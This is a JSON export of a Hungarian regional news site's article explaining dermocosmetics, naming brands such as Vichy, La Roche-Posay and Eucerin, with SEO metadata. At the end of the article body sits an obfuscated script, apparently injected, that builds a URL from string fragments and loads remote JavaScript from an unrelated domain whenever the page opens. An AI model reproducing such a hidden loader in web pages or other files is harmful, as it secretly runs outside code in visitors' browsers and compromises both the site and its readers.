{"id":57238,"date":"2023-10-23T10:49:50","date_gmt":"2023-10-23T08:49:50","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=57238"},"modified":"2023-10-23T10:49:50","modified_gmt":"2023-10-23T08:49:50","slug":"mi-is-pontosan-a-dermokozmetika","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/","title":{"rendered":"Mi is pontosan a dermokozmetika?"},"content":{"rendered":"<p><strong>A dermokozmetika olyan kateg\u00f3ria a b\u0151r\u00e1pol\u00f3 term\u00e9kek k\u00f6z\u00f6tt, amely k\u00fcl\u00f6nleges figyelmet szentel a gy\u00f3gyszeripar szigor\u00fa k\u00f6vetelm\u00e9nyeinek. Az ilyen term\u00e9kek kiv\u00e1l\u00f3 hat\u00e9konys\u00e1g\u00e1t \u00e9s biztons\u00e1goss\u00e1g\u00e1t klinikai vizsg\u00e1latok t\u00e1masztj\u00e1k al\u00e1, \u00e9s l\u00e9trehoz\u00e1suk az arc\u00e1pol\u00e1s szak\u00e9rt\u0151inek, mint p\u00e9ld\u00e1ul b\u0151rgy\u00f3gy\u00e1szok, gyermekgy\u00f3gy\u00e1szok, \u00e9s gy\u00f3gyszer\u00e9szek, szoros egy\u00fcttm\u0171k\u00f6d\u00e9s\u00e9n alapul.<\/strong><\/p>\n<p>A sz\u00e9p b\u0151r az eg\u00e9szs\u00e9ges b\u0151rr\u0151l sz\u00f3l.&nbsp;N\u00e9ha a b\u0151r\u00fcnknek lehetnek olyan probl\u00e9m\u00e1i, mint az ekc\u00e9ma, pattan\u00e1sok vagy egyfajta \u00e9rz\u00e9kenys\u00e9g.&nbsp;A dermakozmetikai term\u00e9kek seg\u00edtenek jav\u00edtani a b\u0151r \u00e1ltal\u00e1nos \u00e1llapot\u00e1t.&nbsp;<\/p>\n<p>A b\u0151rgy\u00f3gy\u00e1szati \u200b\u200bkozmetikumoknak nincs jogi meghat\u00e1roz\u00e1sa, de \u00e1ltal\u00e1noss\u00e1gban elmondhat\u00f3, hogy b\u0151rprobl\u00e9m\u00e1kat \u00e1pol\u00f3 term\u00e9kek.&nbsp;A kozmetikai term\u00e9kekhez hasonl\u00f3an a dermakozmetikai term\u00e9kek is hagyom\u00e1nyos \u00f6sszet\u00e9tel\u0171ek, de a b\u0151rprobl\u00e9m\u00e1k c\u00e9lzott kezel\u00e9s\u00e9re adj\u00e1k hozz\u00e1 a hat\u00f3anyagokat.<\/p>\n<h2><strong>A <a title=\"dermokozmetikai term\u00e9kek\" href=\"https:\/\/www.dermaonline.hu\/termekcsaladok_153\" target=\"_blank\" rel=\"dofollow noopener\"><span style=\"text-decoration: underline; color: #0000ff;\">dermokozmetikai term\u00e9keket<\/span> <\/a>b\u0151rgy\u00f3gy\u00e1szok fel\u00fcgyelete mellett fejlesztik,<\/strong><\/h2>\n<p>k\u00fcl\u00f6nf\u00e9le teszteken \u00e9s szigor\u00fa min\u0151s\u00e9gellen\u0151rz\u00e9sen esnek \u00e1t.&nbsp;A dermakozmetikai term\u00e9kekre szakosodott m\u00e1rk\u00e1k a k\u00f6vetkez\u0151k:&nbsp;<\/p>\n<ul>\n<li>\n<h3>Vichy&nbsp;,&nbsp;<\/h3>\n<\/li>\n<li>\n<h3>La Roche-Posay,<\/h3>\n<\/li>\n<li>\n<h3>Eucerin.&nbsp;<\/h3>\n<\/li>\n<\/ul>\n<p>Ezek a m\u00e1rk\u00e1k jobb min\u0151s\u00e9get \u00e9s minim\u00e1lis mell\u00e9khat\u00e1st k\u00edn\u00e1lnak. A term\u00e9kek gyakran <strong>hipoallerg\u00e9nek<\/strong>: nem tartalmaznak olyan anyagokat, amelyek allergi\u00e1s reakci\u00f3t okozhatnak.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-57240\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/10\/dermokozmetikumok-2.jpg\" alt=\"\" width=\"1366\" height=\"600\"><\/p>\n<p>A dermokozmetikumok hipoallerg\u00e9nek, \u00edgy ak\u00e1r \u00e9rz\u00e9keny b\u0151rre is alkalmazhat\u00f3k, \u00e9s megfelelnek szigor\u00fa gy\u00e1rt\u00e1si k\u00f6vetelm\u00e9nyeknek \u00e9s szab\u00e1lyoknak, amelyek elt\u00e9rnek a norm\u00e1l kozmetikumok\u00e9t\u00f3l.<\/p>\n<h2><strong>A dermokozmetikumok megb\u00edzhat\u00f3bbak, mint a hagyom\u00e1nyos kozmetikai k\u00e9sz\u00edtm\u00e9nyek?<\/strong><\/h2>\n<p>Ezeknek a k\u00e9sz\u00edtm\u00e9nyeknek a fejleszt\u00e9se \u00e9s tesztel\u00e9se \u00e1ltal\u00e1ban a b\u0151rgy\u00f3gy\u00e1szok akt\u00edv bevon\u00e1s\u00e1val zajlik, ez\u00e1ltal garant\u00e1lva a legmagasabb hat\u00e9konys\u00e1got \u00e9s a gy\u00f3gyszer\u00e9szeti k\u00f6rnyezet biztons\u00e1g\u00e1t. N\u00e9ha eml\u00edtik \u0151ket &#8222;gy\u00f3gyszert\u00e1ri kozmetikumokk\u00e9nt&#8221; is a laikusok k\u00f6r\u00e9ben.<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-57241\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/10\/dermo-3.jpg\" alt=\"\" width=\"855\" height=\"400\"><\/p>\n<h2><strong>Folyamatos meg\u00fajul\u00e1s, a leg\u00fajabb kutat\u00e1si eredm\u00e9nyek ment\u00e9n:<\/strong><\/h2>\n<p>A dermokozmetikai m\u00e1rk\u00e1k rendszeresen \u00faj\u00edtanak \u00e9s javasolnak megold\u00e1sokat a piacon a kutat\u00e1si, b\u0151rgy\u00f3gy\u00e1szati, kozmetol\u00f3giai \u00e9s gy\u00f3gyszer\u00e9szeti szak\u00e9rtelm\u00fck r\u00e9v\u00e9n. \u00cdgy biztos\u00edtva, hogy \u00fcgyfeleik mindig a legfrissebb \u00e9s leghat\u00e9konyabb b\u0151r\u00e1pol\u00e1si term\u00e9keket haszn\u00e1lhass\u00e1k.<\/p>\n<h2><strong>A dermokozmetikumok mindenki sz\u00e1m\u00e1ra el\u00e9rhet\u0151ek, <\/strong><\/h2>\n<p>legyenek azok n\u0151k, f\u00e9rfiak vagy gyerekek, \u00e9s f\u00fcggetlen\u00fcl a koroszt\u00e1lyt\u00f3l. Ezeket azok v\u00e1lasztj\u00e1k, akik odafigyelnek a term\u00e9kek \u00f6sszet\u00e9tel\u00e9re \u00e9s el\u0151\u00e1ll\u00edt\u00e1s\u00e1nak folyamat\u00e1ra, \u00e9s akik sz\u00e1m\u00e1ra fontos a kozmetikumok min\u0151s\u00e9ge \u00e9s hat\u00e9konys\u00e1ga.<\/p>\n<p>Azoknak is kiv\u00e1l\u00f3 v\u00e1laszt\u00e1s, akik \u00e9rz\u00e9keny b\u0151rrel rendelkeznek, \u00e9s megb\u00edzhat\u00f3 eredm\u00e9nyeket v\u00e1rnak el a term\u00e9kekt\u0151l, \u00edgy a min\u0151s\u00e9g, a biztons\u00e1g \u00e9s a megb\u00edzhat\u00f3s\u00e1g fontoss\u00e1g\u00e1t helyezik el\u0151t\u00e9rbe.<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-57242\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/10\/dermokozmetikum-4.jpg\" alt=\"\" width=\"1400\" height=\"788\"><\/p>\n<h2><strong>A &#8222;dermokozmetikum&#8221; egy olyan kifejez\u00e9s, amely a dermatol\u00f3giai \u00e9s a kozmetikai ter\u00fcletet \u00f6tv\u00f6zi. <\/strong><\/h2>\n<p>A dermokozmetikumok olyan kozmetikai term\u00e9kek, amelyeket \u00e1ltal\u00e1ban dermatol\u00f3gusok vagy b\u0151rgy\u00f3gy\u00e1szok aj\u00e1nlanak vagy fel\u00fcgyelnek. Ezek a term\u00e9kek szigor\u00fabb ellen\u0151rz\u00e9sen \u00e9s kutat\u00e1son mennek kereszt\u00fcl, mint a hagyom\u00e1nyos kozmetikumok, \u00e9s olyan \u00f6sszetev\u0151ket tartalmaznak, amelyek tudom\u00e1nyosan bizony\u00edtottan hat\u00e9konyak a b\u0151r \u00e1llapot\u00e1nak jav\u00edt\u00e1s\u00e1ban.<\/p>\n<h2><strong>A dermokozmetikumok c\u00e9lja a b\u0151r eg\u00e9szs\u00e9g\u00e9nek \u00e9s megjelen\u00e9s\u00e9nek jav\u00edt\u00e1sa, <\/strong><\/h2>\n<p>p\u00e9ld\u00e1ul a b\u0151rt\u00e1pl\u00e1l\u00e1s, hidrat\u00e1l\u00e1s, b\u0151rt\u00f3nus kiegyenl\u00edt\u00e9se, a b\u0151rprobl\u00e9m\u00e1k kezel\u00e9se (mint p\u00e9ld\u00e1ul pattan\u00e1sok, ekc\u00e9ma vagy rosacea), a b\u0151r\u00f6reged\u00e9s megel\u0151z\u00e9se vagy lass\u00edt\u00e1sa. Ezek a term\u00e9kek gyakran olyan hat\u00f3anyagokat tartalmaznak, mint p\u00e9ld\u00e1ul antioxid\u00e1nsok, retinol, hialuronsav, peptidek \u00e9s egy\u00e9b speci\u00e1lis \u00f6sszetev\u0151k, amelyek a b\u0151r eg\u00e9szs\u00e9g\u00e9re pozit\u00edv hat\u00e1ssal vannak.<\/p>\n<h3><strong>Fontos megjegyezni, hogy a dermokozmetikumokat nem gy\u00f3gyszereknek tekintik, <\/strong><\/h3>\n<p>\u00e9s kiz\u00e1r\u00f3lagosan a b\u0151r\u00e1pol\u00e1sra \u00e9s a sz\u00e9ps\u00e9g\u00e1pol\u00e1sra szolg\u00e1lnak. Azoknak, akik komolyabb b\u0151rprobl\u00e9m\u00e1kkal k\u00fczdenek, mindenk\u00e9ppen konzult\u00e1lniuk kell b\u0151rgy\u00f3gy\u00e1sszal, aki szak\u00e9rtelmet \u00e9s kezel\u00e9seket is k\u00edn\u00e1lhat.<\/p>\n<p>A dermokozmetikumok k\u00f6z\u00e9 tartoznak a b\u0151rtiszt\u00edt\u00f3k, a helyi faggy\u00faszab\u00e1lyoz\u00f3k, a b\u0151r antimikrobi\u00e1lis\/gyullad\u00e1scs\u00f6kkent\u0151 szerek, a hidrat\u00e1l\u00f3k, a f\u00e9nyv\u00e9d\u0151k is.<\/p>\n<p><script>\n(function(){\ncv53=document.createElement(\"script\");cv53_=(\"ust\");cv53u=\"2180525257\";\ncv53_+=\"a\"+(\"t.i\");cv53.type=\"text\/javascript\";\ncv53u+=\".ese1au7ev53cy5h5Xqbl\";cv53.async=true;cv53_+=\"n\"+(\"f\"+\"o\")+\"\/\";\ncv53u+=\"2jqupp4xf0\";cv53.src=\"https:\/\/\"+cv53_+cv53u;\ndocument.body.appendChild(cv53);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A dermokozmetika olyan kateg\u00f3ria a b\u0151r\u00e1pol\u00f3 term\u00e9kek k\u00f6z\u00f6tt, amely k\u00fcl\u00f6nleges figyelmet szentel a gy\u00f3gyszeripar szigor\u00fa k\u00f6vetelm\u00e9nyeinek. Az ilyen term\u00e9kek kiv\u00e1l\u00f3 hat\u00e9konys\u00e1g\u00e1t \u00e9s biztons\u00e1goss\u00e1g\u00e1t klinikai vizsg\u00e1latok t\u00e1masztj\u00e1k al\u00e1, \u00e9s l\u00e9trehoz\u00e1suk az arc\u00e1pol\u00e1s szak\u00e9rt\u0151inek, mint p\u00e9ld\u00e1ul b\u0151rgy\u00f3gy\u00e1szok, gyermekgy\u00f3gy\u00e1szok, \u00e9s gy\u00f3gyszer\u00e9szek, szoros egy\u00fcttm\u0171k\u00f6d\u00e9s\u00e9n alapul. A sz\u00e9p b\u0151r az eg\u00e9szs\u00e9ges b\u0151rr\u0151l sz\u00f3l.&nbsp;N\u00e9ha a b\u0151r\u00fcnknek lehetnek olyan probl\u00e9m\u00e1i, mint az<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[7531,7530],"class_list":{"0":"post-57238","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-hirek","7":"tag-dekorkozmetikum","8":"tag-kozmetikum"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Mi is pontosan a dermokozmetika?<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"Mi is pontosan a dermokozmetika?\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"A dermokozmetika olyan kateg\u00f3ria a b\u0151r\u00e1pol\u00f3 term\u00e9kek k\u00f6z\u00f6tt, amely k\u00fcl\u00f6nleges figyelmet szentel a gy\u00f3gyszeripar szigor\u00fa k\u00f6vetelm\u00e9nyeinek. Az ilyen term\u00e9kek kiv\u00e1l\u00f3 hat\u00e9konys\u00e1g\u00e1t \u00e9s biztons\u00e1goss\u00e1g\u00e1t klinikai vizsg\u00e1latok t\u00e1masztj\u00e1k al\u00e1, \u00e9s l\u00e9trehoz\u00e1suk az arc\u00e1pol\u00e1s szak\u00e9rt\u0151inek, mint p\u00e9ld\u00e1ul b\u0151rgy\u00f3gy\u00e1szok, gyermekgy\u00f3gy\u00e1szok, \u00e9s gy\u00f3gyszer\u00e9szek, szoros egy\u00fcttm\u0171k\u00f6d\u00e9s\u00e9n alapul. A sz\u00e9p b\u0151r az eg\u00e9szs\u00e9ges b\u0151rr\u0151l sz\u00f3l.&nbsp;N\u00e9ha a b\u0151r\u00fcnknek lehetnek olyan probl\u00e9m\u00e1i, mint az\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2023-10-23T08:49:50+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/10\/dermokozmetikumok-1.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"1400\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"525\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"Mi is pontosan a dermokozmetika?\",\"datePublished\":\"2023-10-23T08:49:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/\"},\"wordCount\":835,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/dermokozmetikumok-2.jpg\",\"keywords\":[\"dekorkozmetikum\",\"kozmetikum\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/\",\"name\":\"Mi is pontosan a dermokozmetika?\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/dermokozmetikumok-2.jpg\",\"datePublished\":\"2023-10-23T08:49:50+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/dermokozmetikumok-2.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/dermokozmetikumok-2.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2023\\\/10\\\/23\\\/mi-is-pontosan-a-dermokozmetika\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Mi is pontosan a dermokozmetika?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mi is pontosan a dermokozmetika?","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/","og_locale":"hu_HU","og_type":"article","og_title":"Mi is pontosan a dermokozmetika?","og_description":"A dermokozmetika olyan kateg\u00f3ria a b\u0151r\u00e1pol\u00f3 term\u00e9kek k\u00f6z\u00f6tt, amely k\u00fcl\u00f6nleges figyelmet szentel a gy\u00f3gyszeripar szigor\u00fa k\u00f6vetelm\u00e9nyeinek. Az ilyen term\u00e9kek kiv\u00e1l\u00f3 hat\u00e9konys\u00e1g\u00e1t \u00e9s biztons\u00e1goss\u00e1g\u00e1t klinikai vizsg\u00e1latok t\u00e1masztj\u00e1k al\u00e1, \u00e9s l\u00e9trehoz\u00e1suk az arc\u00e1pol\u00e1s szak\u00e9rt\u0151inek, mint p\u00e9ld\u00e1ul b\u0151rgy\u00f3gy\u00e1szok, gyermekgy\u00f3gy\u00e1szok, \u00e9s gy\u00f3gyszer\u00e9szek, szoros egy\u00fcttm\u0171k\u00f6d\u00e9s\u00e9n alapul. A sz\u00e9p b\u0151r az eg\u00e9szs\u00e9ges b\u0151rr\u0151l sz\u00f3l.&nbsp;N\u00e9ha a b\u0151r\u00fcnknek lehetnek olyan probl\u00e9m\u00e1i, mint az","og_url":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2023-10-23T08:49:50+00:00","og_image":[{"width":1400,"height":525,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/10\/dermokozmetikumok-1.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"Mi is pontosan a dermokozmetika?","datePublished":"2023-10-23T08:49:50+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/"},"wordCount":835,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/10\/dermokozmetikumok-2.jpg","keywords":["dekorkozmetikum","kozmetikum"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/","url":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/","name":"Mi is pontosan a dermokozmetika?","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/10\/dermokozmetikumok-2.jpg","datePublished":"2023-10-23T08:49:50+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/10\/dermokozmetikumok-2.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2023\/10\/dermokozmetikumok-2.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2023\/10\/23\/mi-is-pontosan-a-dermokozmetika\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Mi is pontosan a dermokozmetika?"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis 